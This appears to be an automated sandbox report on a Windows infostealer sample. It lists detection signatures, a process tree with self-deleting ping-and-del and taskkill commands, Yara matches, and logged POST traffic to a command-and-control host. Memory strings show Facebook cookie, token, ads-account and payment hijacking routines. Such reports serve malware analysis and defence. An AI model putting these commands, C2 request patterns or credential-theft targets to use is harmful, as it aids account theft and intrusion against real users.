Analysis Report Cyfj6XGbkd

Overview

General Information

Sample Name: Cyfj6XGbkd (renamed file extension from none to exe)
Analysis ID: 346134
MD5: 63204eb716c856723a010747d58a6b00
SHA1: 7e97f00b4c3580cedee02c448ac9aeb54afefbd2
SHA256: 6d2db66a98ec5730bdcbc41dc7c78210fe24fe48bf7e44b59ab01c2084900456

Detection

Score: 93
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to detect sleep reduction / modifications
Contains functionality to infect the boot sector
Hides threads from debuggers
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has a writeable .text section
Registers a new ROOT certificate
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Checks for available system drives (often done to infect USB drives)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read device registry values (via SetupAPI)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a Chrome extension
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains strange resources
Queries device information via Setup API
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara signature match

Startup

  • System is w10x64
  • Cyfj6XGbkd.exe (PID: 1676 cmdline: 'C:\Users\user\Desktop\Cyfj6XGbkd.exe' MD5: 63204EB716C856723A010747D58A6B00)
    • msiexec.exe (PID: 4828 cmdline: msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi' MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
    • 56BB1610C0318054.exe (PID: 476 cmdline: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 0011 user01 MD5: 63204EB716C856723A010747D58A6B00)
      • 1611970637183.exe (PID: 6028 cmdline: 'C:\Users\user\AppData\Roaming\1611970637183.exe' /sjson 'C:\Users\user\AppData\Roaming\1611970637183.txt' MD5: EF6F72358CB02551CAEBE720FBC55F95)
      • ThunderFW.exe (PID: 7156 cmdline: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe' MD5: F0372FF8A6148498B19E04203DBB9E69)
      • cmd.exe (PID: 6236 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • PING.EXE (PID: 4248 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
    • 56BB1610C0318054.exe (PID: 576 cmdline: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 200 user01 MD5: 63204EB716C856723A010747D58A6B00)
      • cmd.exe (PID: 6012 cmdline: cmd.exe /c taskkill /f /im chrome.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 1972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • taskkill.exe (PID: 5740 cmdline: taskkill /f /im chrome.exe MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
      • cmd.exe (PID: 6752 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • PING.EXE (PID: 6624 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
    • cmd.exe (PID: 6336 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\Cyfj6XGbkd.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • PING.EXE (PID: 6452 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
  • msiexec.exe (PID: 4584 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding C6BE2003C858D11BE040843C2C46EAA2 C MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.366076006.00000000025E0000.00000040.00000001.sdmp | Ping_Command_in_EXE | Detects an suspicious ping command execution in an executable | Florian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
00000002.00000002.413908813.0000000002810000.00000040.00000001.sdmp | Ping_Command_in_EXE | Detects an suspicious ping command execution in an executable | Florian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
00000004.00000002.378006718.0000000002560000.00000040.00000001.sdmp | Ping_Command_in_EXE | Detects an suspicious ping command execution in an executable | Florian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.Cyfj6XGbkd.exe.25e0000.5.raw.unpack | Ping_Command_in_EXE | Detects an suspicious ping command execution in an executable | Florian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
4.2.56BB1610C0318054.exe.2560000.3.unpack | Ping_Command_in_EXE | Detects an suspicious ping command execution in an executable | Florian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
2.2.56BB1610C0318054.exe.10000000.7.unpack | Ping_Command_in_EXE | Detects an suspicious ping command execution in an executable | Florian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
2.2.56BB1610C0318054.exe.2810000.5.raw.unpack | Ping_Command_in_EXE | Detects an suspicious ping command execution in an executable | Florian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
0.2.Cyfj6XGbkd.exe.10000000.6.unpack | Ping_Command_in_EXE | Detects an suspicious ping command execution in an executable | Florian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | Metadefender: Detection: 24%
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | ReversingLabs: Detection: 58%
Multi AV Scanner detection for submitted file
Source: Cyfj6XGbkd.exe | Virustotal: Detection: 40%
Source: Cyfj6XGbkd.exe | Metadefender: Detection: 24%
Source: Cyfj6XGbkd.exe | ReversingLabs: Detection: 58%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Cyfj6XGbkd.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | Code function: 0_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | Code function: 2_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,

Compliance:

Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | Unpacked PE file: 2.2.56BB1610C0318054.exe.2810000.5.unpack
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | Unpacked PE file: 4.2.56BB1610C0318054.exe.2560000.3.unpack
Uses 32bit PE files
Source: Cyfj6XGbkd.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Uses new MSVCR Dlls
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | File opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
Binary contains paths to debug symbols
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.2.dr
Source: Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1611970637183.exe, 00000009.00000000.372796373.000000000040F000.00000002.00020000.sdmp, 1611970637183.exe.2.dr
Source: Binary string: atl71.pdbT source: atl71.dll.2.dr
Source: Binary string: msvcr71.pdb\ source: msvcr71.dll.2.dr
Source: Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_user.pdb source: download_user.dll.2.dr
Source: Binary string: atl71.pdb source: atl71.dll.2.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.2.dr
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.2.dr
Source: Binary string: msvcp71.pdb source: msvcp71.dll.2.dr
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.2.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp
Source: Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 00000012.00000000.397410202.000000000099C000.00000002.00020000.sdmp, ThunderFW.exe.2.dr
Source: Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.2.dr
Source: Binary string: msvcr71.pdb source: msvcr71.dll.2.dr
Source: Binary string: d:\BranchAI\launcher\Release\fileLauncher.pdb source: MSIDCDD.tmp.1.dr
Checks for available system drives (often done to infect USB drives)
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: z:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: x:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: v:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: t:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: r:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: p:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: n:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: l:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: j:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: h:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: f:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: b:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: y:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: w:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: u:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: s:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: q:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: o:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: m:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: k:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: i:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: g:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: e:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: c:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: a:
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe | Code function: 0_2_1001A170 FindFirstFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe | Code function: 2_2_1001A170 FindFirstFileA,FindClose,
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\

Networking:

Uses ping.exe to check the status of other devices and networks
Source: unknown | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: global traffic | HTTP traffic detected: GET /info_old/ddd HTTP/1.1 | Host: 84CFBA021A5A6662.xyz | Accept: */*
Source: global traffic | HTTP traffic detected: POST //fine/send HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 82 | Host: 84cfba021a5a6662.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 81 | Host: 84cfba021a5a6662.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 81 | Host: 84cfba021a5a6662.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 81 | Host: 84cfba021a5a6662.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 81 | Host: 84cfba021a5a6662.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 81 | Host: 84cfba021a5a6662.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 81 | Host: 84cfba021a5a6662.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/e HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 677 | Host: 84cfba021a5a6662.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 81 | Host: 84cfba021a5a6662.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/g HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 1393 | Host: 84cfba021a5a6662.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 81 | Host: 84cfba021a5a6662.xyz
Source: global traffic | HTTP traffic detected: GET /info_old/r HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Host: 84cfba021a5a6662.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 81 | Host: 84cfba021a5a6662.xyz
Source: global traffic | HTTP traffic detected: GET /info_old/r HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Host: 84cfba021a5a6662.xyz
Source: global traffic | HTTP traffic detected: GET /info_old/ddd HTTP/1.1 | Host: 84CFBA021A5A6662.xyz | Accept: */*
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp | String found in binary or memory: "name":"fb_dtsg","value":"name="fb_dtsg" value="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps://www.facebook.com/""2%d0https://graph.facebook.com/me/friends?access_token=%s&pretty=1&limit=1summarytotal_count{}summarytotal_count%dquery_friends.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: count = %d equals www.facebook.com (Facebook)
Source: Cyfj6XGbkd.exe | String found in binary or memory: &AboutZwww.VB-CABLE.com web site[News are on Facebook ! equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp | String found in binary or memory: -3https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1errorSummaryconfirmemail.phpcard_type_name-110query_payment2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: ret = %s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe | String found in binary or memory: _time":"13245952903455635","lastpingday":"13245947457776957","location":1,"manifest":{"app":{"launch":{"container":"tab","web_url":"http://www.youtube.com"},"web_content":{"enabled":true,"origin":"http://www.youtube.com"}},"current_locale":"en","default_locale equals www.youtube.com (Youtube)
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp | String found in binary or memory: accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originreferer: https://www.messenger.com/origin: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie: c_user=ookie: xs=ookie: ;%[^;]; https://m.facebook.com/settings/email/<span class="_52ji _8uk3">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>@&#064;@&#064;https://m.facebook.com/settings/sms/<strong><span dir="ltr">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>+ https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_point"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_name/"draftID":Accept: */*Origin: https://m.facebook.comReferer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Requested-With: XMLHttpRequestX-Response-Format: JSONStreampage_name=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=3&__user=,"https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7D"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointsec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originSec-Fetch-User: ?1upgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_category/"pageID":Referer: https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7DAccept: */*Origin: https://m.facebook.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Response-Format: JSONStreamX-Requested-With: XMLHttpRequestpage_category=1300&draft_id=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__user=}"+ .-_@@friends2page.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: pageid = %s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp | String found in binary or memory: bad allocationSOFTWARE\Mozilla\Mozilla FirefoxCurrentVersion\\MainInstall Directory%s\firefox.exe{}[]"1""2""3"123bad allocationc_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adssettings/?act=&access_token:""access_token":""query_token_account_id.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmp | String found in binary or memory: c_user=xs=https://www.facebook.com/ads/manager/account_settingsaccountID:"access_token:"Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: none""query_token_account_id_laomaozi.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
